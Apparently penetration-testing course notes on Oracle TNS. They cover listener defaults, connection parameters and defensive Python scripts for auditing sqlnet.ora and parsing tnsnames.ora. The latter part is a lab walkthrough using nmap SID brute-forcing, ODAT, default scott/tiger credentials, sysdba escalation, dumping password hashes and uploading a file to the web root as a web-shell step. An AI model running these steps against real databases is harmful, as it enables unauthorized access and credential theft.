Oracle TNS
Oracle TNS: Oracle Transparent Network Substrate
A protocol that facilitates communication between Oracle databases and applications over networks
TNS supports several protocol stacks between client applications and the database server, such as IPX/SPX and TCP/IP
It has become a common solution for large, complex databases in the healthcare, finance, and retail industries
Its built-in encryption mechanism protects data in transit
Ideal for enterprise environments where data security is paramount
TNS now supports IPv6 and SSL/TLS encryption, which makes it suitable for:
Name resolution, connection management, load balancing, security
Default Config
Default: the listener listens for incoming connections on TCP port 1521
The TNS listener is configured to support TCP/IP, UDP, IPX/SPX, and AppleTalk
Can support multiple network interfaces and listen on specific IPs
Default: can be remotely managed in Oracle 8i/9i, but not in 10g/11g
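The defaults above (open listener on 1521, no timeouts, encryption available but not enforced) are exactly what a quick configuration audit should catch. The following is an added example, not code from these notes or from Oracle: it parses sqlnet.ora-style `KEY = VALUE` lines and reports which hardening settings are missing, run over a constructed weak file and a constructed hardened one. The parameter names are real Oracle Net parameters; the node addresses and both sample files are assumptions made for illustration.

```python
# Added example (not from the page or from Oracle): audit sqlnet.ora settings that
# govern the defaults discussed above. Parameter names are real Oracle Net
# parameters; both configuration texts below are constructed samples.

def parse_sqlnet(text):
    """Parse sqlnet.ora-style KEY = VALUE lines into a dict.

    Comments (#) are dropped, keys are upper-cased, and a value written as a
    parenthesised list such as (10.0.0.10, 10.0.0.11) is kept as the text
    between the parentheses.
    """
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        params[key.upper()] = value.strip("()").strip()
    return params


def _positive_int(value):
    return value is not None and value.isdigit() and int(value) > 0


# Each check: (parameter, predicate on its value, finding reported when it fails)
CHECKS = [
    ("SQLNET.EXPIRE_TIME", _positive_int,
     "SQLNET.EXPIRE_TIME not set to a positive value: dead connections are never detected"),
    ("SQLNET.INBOUND_CONNECT_TIMEOUT", _positive_int,
     "SQLNET.INBOUND_CONNECT_TIMEOUT not set: clients may hold half-open connections indefinitely"),
    ("SQLNET.ENCRYPTION_SERVER", lambda v: (v or "").upper() == "REQUIRED",
     "SQLNET.ENCRYPTION_SERVER is not REQUIRED: traffic may travel in clear text"),
    ("TCP.VALIDNODE_CHECKING", lambda v: (v or "").upper() == "YES",
     "TCP.VALIDNODE_CHECKING is not YES: the listener accepts any source address"),
]


def audit_sqlnet(text):
    """Return the list of findings for a sqlnet.ora text (empty means all checks pass)."""
    params = parse_sqlnet(text)
    findings = [msg for key, ok, msg in CHECKS if not ok(params.get(key))]
    # Node checking without an invited list would lock everyone out, so flag that too.
    if params.get("TCP.VALIDNODE_CHECKING", "").upper() == "YES" and not params.get("TCP.INVITED_NODES"):
        findings.append("TCP.VALIDNODE_CHECKING is YES but TCP.INVITED_NODES is empty")
    return findings


# Constructed sample: a sqlnet.ora that leaves everything at the defaults.
WEAK_SQLNET = """
# constructed sample, not a real deployment
SQLNET.AUTHENTICATION_SERVICES = (NTS)
"""

# Constructed sample: the same file with timeouts, encryption and node checking set.
# The node addresses are placeholders.
HARDENED_SQLNET = """
# constructed sample, not a real deployment
SQLNET.EXPIRE_TIME = 10
SQLNET.INBOUND_CONNECT_TIMEOUT = 60
SQLNET.ENCRYPTION_SERVER = REQUIRED
SQLNET.ENCRYPTION_TYPES_SERVER = (AES256)
TCP.VALIDNODE_CHECKING = YES
TCP.INVITED_NODES = (10.0.0.10, 10.0.0.11)
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SQLNET), ("hardened", HARDENED_SQLNET)):
        print(name, audit_sqlnet(cfg) or ["no findings"])
```

The weak file produces four findings, the hardened one none. The checks are deliberately strict (encryption must be REQUIRED, not merely ACCEPTED), because a listener that only offers encryption still lets a client negotiate it away.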
Oracle databases can be protected with a PlsqlExclusionList (PL/SQL Exclusion List)
User-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory
Contains the names of PL/SQL packages/types that should be excluded from execution
Once the PL/SQL Exclusion List is created, it can be loaded into the db instance
It serves as a blacklist of packages that can't be accessed through the Oracle Application Server
Connection parameters (tnsnames.ora / sqlnet.ora)
connect_data # attributes of the connection: service name, SID, protocol, db instance id
instance_name # name of the db instance the client connects to
service_name # name of the service the client wants to connect to
security # security type for connections
connect_timeout # time limit in seconds for the client to establish a connection to the db
receive_timeout # time limit in seconds for the client to receive a response from the db
send_timeout # time limit in seconds for the client to send a request to the db
sqlnet.expire_time # time limit in seconds for the client to detect that a connection has failed
trace_level # tracing level for the db connection
trace_directory # dir where trace files are stored
trace_file_name # name of the trace file
log_file # file where log info is written
Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools for our Pwnbox instance in case it does not have these already.
# oracle-tools-setup.sh
#!/bin/bash
# build deps, then ODAT and its submodules
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/   # the submodule commands must run inside the cloned repo
git submodule init
git submodule update
# Oracle instant client (basic + sqlplus)
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
# Python deps for ODAT
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete
./odat.py -h
usage: odat.py [-h] [--version]

     _  __   _  ___
    / \|  \ / \|_ _|
   ( o ) o ) o || |
    \_/|__/|_n_||_|
-------------------------------------------
  _        __           _        ___
 / \      |  \         / \      |_ _|
( o )     | o )       ( o )      | |
 \_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
ODAT: Oracle Database Attacking Tool
Open-source pentesting tool written in Python, designed to enumerate and exploit vulns in Oracle databases
Can be used to identify and exploit flaws, including SQLi, RCE, and privesc
sudo nmap -p1521 -sV 10.129.204.235 --open
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
In Oracle RDBMS, a SID (System Identifier) is a unique name that identifies a particular db instance
A database can have multiple instances, each with its own SID
Instance: a set of processes and memory structures that interact to manage the db's data
When a client connects to an Oracle db, it specifies the SID in its connection string
The client uses this SID to identify which db instance it wants to connect to
If not specified, the default value defined in the tnsnames.ora file is used
The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. If the client specifies an incorrect SID, the connection attempt will fail. Database administrators can use the SID to monitor and manage the individual instances of a database. For example, they can start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance using tools like Oracle Enterprise Manager.
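To make concrete how an alias in tnsnames.ora resolves to the SID or service name (and which of the connection parameters listed earlier, such as connect_timeout, are actually set for it), here is an added example that is not part of the original notes and not ODAT or Oracle code: a small parser for the nested parenthesised format of tnsnames.ora, run over a constructed file. The alias names, hosts and service name in the sample are assumptions chosen for illustration.

```python
import re

# Constructed sample tnsnames.ora (not from the page). Alias names, hosts and
# the service name are assumptions chosen for illustration.
SAMPLE_TNSNAMES = """
# constructed sample, not a real deployment
XE =
  (DESCRIPTION =
    (CONNECT_TIMEOUT = 5)
    (ADDRESS = (PROTOCOL = TCP)(HOST = db.example.internal)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = XE)
    )
  )

LEGACY =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.0.0.5)(PORT = 1521))
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.0.0.6)(PORT = 1521))
    )
    (CONNECT_DATA = (SID = ORCL))
  )
"""


def _tokenize(text):
    """Split the file into '(', ')', '=' and bare words, dropping # comments."""
    tokens = []
    for line in text.splitlines():
        tokens.extend(re.findall(r"\(|\)|=|[^\s()=]+", line.split("#", 1)[0]))
    return tokens


def _parse_value(tokens, i):
    """Parse the value that follows an '='; return (value, index after it).

    A value is either a bare word or a run of (KEY = value) groups, returned
    as a dict; a key that repeats (e.g. several ADDRESS entries) becomes a list.
    """
    if tokens[i] != "(":
        return tokens[i], i + 1
    group = {}
    while i < len(tokens) and tokens[i] == "(":
        key = tokens[i + 1].upper()
        if tokens[i + 2] != "=":
            raise ValueError("expected '=' after %s" % key)
        value, i = _parse_value(tokens, i + 3)
        if i >= len(tokens) or tokens[i] != ")":
            raise ValueError("unbalanced parenthesis after %s" % key)
        i += 1
        if key in group:
            if not isinstance(group[key], list):
                group[key] = [group[key]]
            group[key].append(value)
        else:
            group[key] = value
    return group, i


def parse_tnsnames(text):
    """Return {ALIAS: parsed tree} for every alias in the file."""
    tokens = _tokenize(text)
    entries, i = {}, 0
    while i < len(tokens):
        alias = tokens[i].upper()
        if i + 1 >= len(tokens) or tokens[i + 1] != "=":
            raise ValueError("expected '=' after alias %s" % alias)
        value, i = _parse_value(tokens, i + 2)
        entries[alias] = value
    return entries


def connect_target(entry):
    """What the client will use for an alias: (host, port, SID or service name, connect_timeout)."""
    desc = entry["DESCRIPTION"]
    addresses = desc.get("ADDRESS") or desc["ADDRESS_LIST"]["ADDRESS"]
    first = addresses[0] if isinstance(addresses, list) else addresses
    cd = desc.get("CONNECT_DATA", {})
    target = cd.get("SERVICE_NAME") or cd.get("SID")
    timeout = desc.get("CONNECT_TIMEOUT")
    return first["HOST"], int(first["PORT"]), target, (int(timeout) if timeout is not None else None)


def aliases_without_timeout(entries):
    """Aliases that never set CONNECT_TIMEOUT, so a connect can hang on an unresponsive listener."""
    return [alias for alias, entry in entries.items() if "CONNECT_TIMEOUT" not in entry["DESCRIPTION"]]


if __name__ == "__main__":
    parsed = parse_tnsnames(SAMPLE_TNSNAMES)
    for alias in parsed:
        print(alias, connect_target(parsed[alias]))
    print("no connect_timeout:", aliases_without_timeout(parsed))
```

The parser accepts both the single-ADDRESS form and an ADDRESS_LIST with several addresses, and distinguishes a SERVICE_NAME entry from an older SID entry, which is the difference between the two sample aliases.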
There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap, hydra, odat, and others. Let us use nmap first.
Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
| oracle-sid-brute:
|_ XE
We can use odat.py to perform a variety of scans to gather info about Oracle db services/components
Scans can retrieve db names, versions, running processes, user accounts, vulns, misconfigs, etc.
ODAT
./odat.py all -s 10.129.204.235
In this example, we found valid creds for the user scott with the password tiger
Now we can use the tool sqlplus to connect to the Oracle db and interact with it
SQLplus - Log In
sqlplus scott/tiger@10.129.204.235/XE
SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
Version 21.4.0.0.0
Copyright (c) 1982, 2021, Oracle. All rights reserved.
SQL>
If you come across the following error:
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory
please run the command below (fix taken from an external reference):
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
There are many SQLplus commands we can use to enumerate the db manually
For example, we can list all tables available in the current db and show the privileges of the current user
Oracle RDBMS - Interaction
SQL> select table_name from all_tables;
TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
scott has no admin privs
We can try using this account to log in as System Database Admin (sysdba), giving us higher privs
Oracle RDBMS - Db Enum
sqlplus scott/tiger@10.129.204.235/XE as sysdba
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SQL> select name, password from sys.user$;
# we can retrieve password hashes from sys.user$ and try to crack them offline
Another option is to upload a web shell to the target
Default web root paths:
Linux: /var/www/html
Windows: C:\inetpub\wwwroot
Oracle RDBMS - File Upload
echo "oracle file upload test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
We can test whether the file upload worked with curl
We will send a GET http://<IP>/testing.txt request, or we can visit the URL in a browser
curl -X GET http://10.129.204.235/testing.txt
oracle file upload test